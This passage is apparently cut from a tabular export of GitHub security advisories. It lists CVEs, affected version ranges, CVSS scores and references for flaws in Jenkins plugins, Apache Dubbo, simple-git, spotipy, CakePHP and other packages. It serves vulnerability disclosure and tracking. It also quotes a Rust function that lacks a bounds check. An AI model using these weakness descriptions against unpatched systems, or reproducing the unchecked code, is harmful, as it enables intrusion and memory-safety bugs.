{'ecosystem': 'Maven', 'name': 'com.cloudbees.jenkins.plugins:kubernetes-credentials-provider'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.209.v862c6e5fb'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24425'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-3022'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:02:39Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-rc47-6667-2j5j,2023-02-07T21:16:56Z,2023-01-31T06:30:26Z,,['CVE-2022-25881'],http-cache-semantics vulnerable to Regular Expression Denial of Service,"http-cache semantics contains an Inefficient Regular Expression Complexity , leading to Denial of Service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'http-cache-semantics'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:http-cache-semantics'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25881'}, {'type': 'WEB', 'url': 'https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74'}, {'type': 'PACKAGE', 'url': 'https://github.com/kornelski/http-cache-semantics'}, {'type': 'WEB', 'url': 'https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230622-0008/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T23:48:07Z', 'nvd_published_at': '2023-01-31T05:15:00Z'}" 1.4.0,GHSA-9wrr-4r9v-26xc,2023-02-03T20:33:53Z,2023-01-26T21:30:17Z,,['CVE-2023-24457'],CSRF vulnerability in Jenkins Keycloak Authentication Plugin ,A cross-site request forgery (CSRF) vulnerability in Jenkins Keycloak Authentication Plugin 2.3.0 and earlier allows attackers to trick users into logging in to the attacker's account.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:keycloak'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24457'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2986'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:57:25Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-pxqj-xrv5-qvjf,2023-01-11T23:51:00Z,2023-01-11T23:51:00Z,,[],XML-RPC for PHP's debugger vulnerable to possible XSS attack,"The bundled xml-rpc debugger is susceptible to XSS attacks. Since the debugger is not designed to be exposed to end users but only to the developers using this library, and in the default configuration it is not exposed to requests from the web, the likelihood of exploitation may be low.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phpxmlrpc/phpxmlrpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/security/advisories/GHSA-pxqj-xrv5-qvjf'}, {'type': 'PACKAGE', 'url': 'https://github.com/gggeek/phpxmlrpc'}, {'type': 'WEB', 'url': 'https://github.com/gggeek/phpxmlrpc/releases/tag/4.9.2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T23:51:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-96x6-jf5w-84c5,2023-01-23T18:50:46Z,2023-01-16T00:30:25Z,,['CVE-2023-0306'],phpMyFAQ Stored Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0306'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/1815daef61c432bb73b9dca43f03d140c94ef0c5'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cbba22f0-89ed-4d01-81ea-744979c8cbde'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:10:17Z', 'nvd_published_at': '2023-01-15T22:15:00Z'}" 1.4.0,GHSA-g6pw-999w-j75m,2023-01-20T22:41:01Z,2023-01-20T22:41:01Z,,[],ELF header parsing library doesn't check for valid offset,"The crate has several unsafe sections that don't perform proper pointer validation. An example can be found in the following function: ``` fn section_header_raw(&self) -> &[ET::SectionHeader] { let sh_off = self.elf_header().section_header_offset() as usize; let sh_num = self.elf_header().section_header_entry_num() as usize; unsafe { let sh_ptr = self.content().as_ptr().add(sh_off); from_raw_parts(sh_ptr as *const ET::SectionHeader, sh_num) } } ``` While this will work perfectly fine *if* the ELF header is valid, malicious or malformed input can contain a section header offset of an arbitrary size, meaning that the resultant pointer in the unsafe block can point to an artibrary address in the address space of the process. This can result in unpredictable behaviour, and in our fuzz testing, we discovered that it's trivial to cause SIGABRT (signal 6), or SEGV (signal 11). The function should either be marked as unsafe, with a note that the caller is responsible for providing only valid inputs, or it should ideally do the due diligence to ensure that the offset doesn't exceed the bounds of the header (and add additional checks as necessary). ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'elf_rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vincenthouyi/elf_rs/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/vincenthouyi/elf_rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2022-0079.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T22:41:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-64wv-c7jw-jw2q,2023-01-11T20:54:44Z,2023-01-05T09:30:26Z,,['CVE-2021-4303'],Xataface vulnerable to Cross-site Scripting,"A vulnerability, which was classified as problematic, has been found in shannah Xataface up to 2.x. Affected by this issue is the function testftp of the file install/install_form.js.php of the component Installer. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.0.0 can address this issue. The name of the patch is 94143a4299e386f33bf582139cd4702571d93bde. It is recommended to upgrade the affected component. VDB-217442 is the identifier assigned to this vulnerability. NOTE: Installer is disabled by default.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'xataface/xataface'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4303'}, {'type': 'WEB', 'url': 'https://github.com/shannah/xataface/commit/94143a4299e386f33bf582139cd4702571d93bde'}, {'type': 'PACKAGE', 'url': 'https://github.com/shannah/xataface'}, {'type': 'WEB', 'url': 'https://github.com/shannah/xataface/releases/tag/3.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217442'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217442'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:02:37Z', 'nvd_published_at': '2023-01-05T09:15:00Z'}" 1.4.0,GHSA-wcm6-wv95-7jw6,2023-02-07T21:15:37Z,2023-01-27T00:30:18Z,,['CVE-2023-0488'],Cross-site Scripting in pyload-ng,Cross-site Scripting (XSS) - Stored in GitHub repository pyload/pyload prior to 0.5.0b3.dev42.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyload-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0b3.dev42'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0488'}, {'type': 'WEB', 'url': 'https://github.com/pyload/pyload/commit/46d75a3087f3237d06530d55998938e2e2bda6bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyload/pyload'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4311d8d7-682c-4f2a-b92c-3f9f1a36255a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:15:38Z', 'nvd_published_at': '2023-01-26T22:15:00Z'}" 1.4.0,GHSA-96jv-c7m6-q43g,2023-02-03T20:39:50Z,2023-01-26T21:30:18Z,,['CVE-2023-24446'],Cross-site request forgery vulnerability in Jenkins OpenID Plugin,A cross-site request forgery (CSRF) vulnerability in Jenkins OpenID Plugin 2.4 and earlier allows attackers to trick users into logging in to the attacker's account.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:openid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24446'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2995'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:02:58Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-9f88-wg5r-947j,2023-01-24T18:52:46Z,2023-01-16T12:30:18Z,,['CVE-2022-43717'],Apache Superset vulnerable to Cross-site Scripting,Dashboard rendering does not sufficiently sanitize the content of markdown components leading to possible XSS attack vectors that can be performed by authenticated users with create dashboard permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43717'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/g6zy6vkpvkbj5mj32vmyzwol5ldtg9pl'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:16:57Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-q764-g6fm-555v,2023-02-07T04:11:52Z,2023-01-23T22:05:11Z,,['CVE-2023-23608'],Path traversal in spotipy,"### Summary If a malicious URI is passed to the library, the library can be tricked into performing an operation on a different API endpoint than intended. ### Details The [code Spotipy uses to parse URIs and URLs ](https://github.com/spotipy-dev/spotipy/blob/master/spotipy/client.py#L1942) accepts user data too liberally which allows a malicious user to insert arbitrary characters into the path that is used for API requests. Because it is possible to include `..`, an attacker can redirect for example a track lookup via `spotifyApi.track()` to an arbitrary API endpoint like playlists, but this is possible for other endpoints as well. Before the security advisory feature was enabled on GitHub, I was already in contact with Stéphane Bruckert via e-mail, and he asked me to look into a potential fix. My recommendation is to perform stricter parsing of URLs and URIs, which I implemented in the patch included at the end of the report. If you prefer, I can also invite you to a private fork of the repository. ### Impact The impact of this vulnerability depends heavily on what operations a client application performs when it handles a URI from a user and how it uses the responses it receives from the API. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'spotipy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.22.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-q764-g6fm-555v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23608'}, {'type': 'PACKAGE', 'url': 'https://github.com/spotipy-dev/spotipy'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-23T22:05:11Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-wm32-3r4m-jvcc,2023-01-12T22:47:55Z,2023-01-07T21:30:38Z,,['CVE-2017-20164'],Symbiote Seed Open Redirect vulnerability,A vulnerability was found in Symbiote Seed up to 6.0.2. It has been classified as critical. Affected is the function `onBeforeSecurityLogin` of the file `code/extensions/SecurityLoginExtension.php` of the component `Login`. The manipulation of the argument URL leads to open redirect. It is possible to launch the attack remotely. Upgrading to version 6.0.3 can address this issue. The name of the patch is b065ebd82da53009d273aa7e989191f701485244. It is recommended to upgrade the affected component. VDB-217626 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symbiote/silverstripe-seed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-20164'}, {'type': 'WEB', 'url': 'https://github.com/symbiote/silverstripe-seed/commit/b065ebd82da53009d273aa7e989191f701485244'}, {'type': 'PACKAGE', 'url': 'https://github.com/symbiote/silverstripe-seed'}, {'type': 'WEB', 'url': 'https://github.com/symbiote/silverstripe-seed/releases/tag/6.0.3'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217626'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217626'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:54:48Z', 'nvd_published_at': '2023-01-07T20:15:00Z'}" 1.4.0,GHSA-fprr-rrm8-4534,2023-01-05T12:03:28Z,2023-01-03T18:30:25Z,,['CVE-2021-32824'],Apache Dubbo vulnerable to remote code execution via Telnet Handler,"Apache Dubbo is a Java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-authorization remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information about the providers and methods exposed by the service and it can even allow to shutdown the service. This endpoint is unprotected. Additionally, a provider method can be invoked using the `invoke` handler. This handler uses a safe version of FastJson to process the call arguments. However, the resulting list is later processed with `PojoUtils.realize` which can be used to instantiate arbitrary classes and invoke its setters. Even though FastJson is properly protected with a default blocklist, `PojoUtils.realize` is not, and an attacker can leverage that to achieve remote code execution. Versions 2.6.10 and 2.7.10 contain fixes for this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32824'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-034_043-apache-dubbo/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-05T12:03:28Z', 'nvd_published_at': '2023-01-03T18:15:00Z'}" 1.4.0,GHSA-9w5j-4mwv-2wj8,2023-02-03T20:33:15Z,2023-01-26T21:30:25Z,,['CVE-2022-25860'],Remote code execution in simple-git,"Versions of the package simple-git before 3.16.0 are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'simple-git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25860'}, {'type': 'WEB', 'url': 'https://github.com/steveukx/git-js/pull/881/commits/95459310e5b8f96e20bb77ef1a6559036b779e13'}, {'type': 'WEB', 'url': 'https://github.com/steveukx/git-js/commit/ec97a39ab60b89e870c5170121cd9c1603cc1951'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3177391'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:01:27Z', 'nvd_published_at': '2023-01-26T21:15:00Z'}" 1.4.0,GHSA-pgjv-jrg2-gq3v,2023-01-11T23:47:05Z,2023-01-11T23:47:05Z,,[],dompurify vulnerable to Cross-site Scripting,dompurify prior to version 2.2.2 is vulnerable to cross-site scripting when converting from SVG namespace.,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'dompurify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cure53/DOMPurify/issues/482'}, {'type': 'PACKAGE', 'url': 'https://github.com/cure53/DOMPurify'}, {'type': 'WEB', 'url': 'https://github.com/cure53/DOMPurify/releases/tag/2.2.2'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-DOMPURIFY-1035544'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T23:47:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-8m9f-c5p9-wqch,2023-01-27T01:01:03Z,2023-01-26T21:30:25Z,,['CVE-2022-25894'],Remote Code Execution in com.bstek.uflo:uflo-core,"All versions of the package com.bstek.uflo:uflo-core are vulnerable to Remote Code Execution (RCE) in the ExpressionContextImpl class via jexl.createExpression(expression).evaluate(context); functionality, due to improper user input validation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.uflo:uflo-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25894'}, {'type': 'WEB', 'url': 'https://fmyyy1.github.io/2022/10/23/uflo2rce/'}, {'type': 'WEB', 'url': 'https://github.com/youseries/uflo/blob/b3e198bc6523e5a6ba69edd84ba10e05a3b78726/uflo-core/src/main/java/com/bstek/uflo/expr/impl/ExpressionContextImpl.java#L126'}, {'type': 'WEB', 'url': 'https://github.com/youseries/uflo/blob/b3e198bc6523e5a6ba69edd84ba10e05a3b78726/uflo-core/src/main/java/com/bstek/uflo/expr/impl/ExpressionContextImpl.java%23L126'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-COMBSTEKUFLO-3091112'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:01:03Z', 'nvd_published_at': '2023-01-26T21:15:00Z'}" 1.4.0,GHSA-pp4w-9x82-6r47,2023-02-07T04:06:24Z,2023-01-30T18:30:28Z,,['CVE-2023-24830'],Apache IoTDB contains Improper Authentication,Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 before 0.13.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.iotdb:iotdb-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24830'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/iotdb'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/l4fon37687jz5ohgsnz2ko9fv400915t'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:36:00Z', 'nvd_published_at': '2023-01-30T17:15:00Z'}" 1.4.0,GHSA-mj62-m63x-mh84,2023-02-03T20:35:40Z,2023-01-26T21:30:18Z,,['CVE-2023-24445'],Open redirect vulnerability in Jenkins OpenID Plugin ,Jenkins OpenID Plugin 2.4 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:openid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24445'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2997'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:59:33Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-m3g7-wrrq-v5c8,2023-01-11T20:55:00Z,2023-01-05T00:30:17Z,,['CVE-2023-0055'],Pyload contains Sensitive Cookie in HTTPS Session Without 'Secure' Attribute,"Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository pyload/pyload prior to 0.5.0b3.dev32. The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session. This issue is patched in version 0.5.0b3.dev32.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyload-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0b3.dev32'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0055'}, {'type': 'WEB', 'url': 'https://github.com/pyload/pyload/commit/7b53b8d43c2c072b457dcd19c8a09bcfc3721703'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyload/pyload'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ed88e240-99ff-48a1-bf32-8e1ef5f13cce'}]","{'cwe_ids': ['CWE-319', 'CWE-614'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-06T23:11:58Z', 'nvd_published_at': '2023-01-04T22:15:00Z'}" 1.4.0,GHSA-95jq-24cr-pgrq,2023-02-03T20:46:15Z,2023-01-26T21:30:18Z,,['CVE-2023-24423'],Cross-site request forgery in Jenkins Gerrit Trigger Plugin,A cross-site request forgery (CSRF) vulnerability in Jenkins Gerrit Trigger Plugin 2.38.0 and earlier allows attackers to rebuild previous builds triggered by Gerrit.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.sonyericsson.hudson.plugins.gerrit:gerrit-trigger'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.38.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24423'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2137'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:06:03Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-p76f-wr22-4rv6,2023-01-20T23:35:01Z,2023-01-20T23:35:01Z,,[],CakePHP vulnerable to Remote File Inclusion through View template name manipulation,"CakePHP 2.x prior to 2.0.99, 2.1.99, 2.2.99, 2.3.99, 2.4.99, 2.5.99, 2.6.12, and 2.7.6 and 3.x prior to 3.0.15 and 3.1.4 is vulnerable to Remote File Inclusion through View template name manipulation.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/commit/5e60cc5d182e6131e3fbdfdf69f49d560c9ff78b'}, {'type': 'WEB', 'url': 'https://bakery.cakephp.org/2015/11/05/cakephp_3015_314_2612_276_released.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/cakephp/cakephp/2015-11-05.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/cakephp/cakephp'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:35:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-pjx4-3f3p-29v3,2023-01-11T20:54:03Z,2023-01-05T09:30:27Z,,['CVE-2016-15010'],django-ucamlookup Cross-site Scripting vulnerability,"A vulnerability classified as problematic was found in University of Cambridge django-ucamlookup up to 1.9.1. Affected by this vulnerability is an unknown functionality of the component 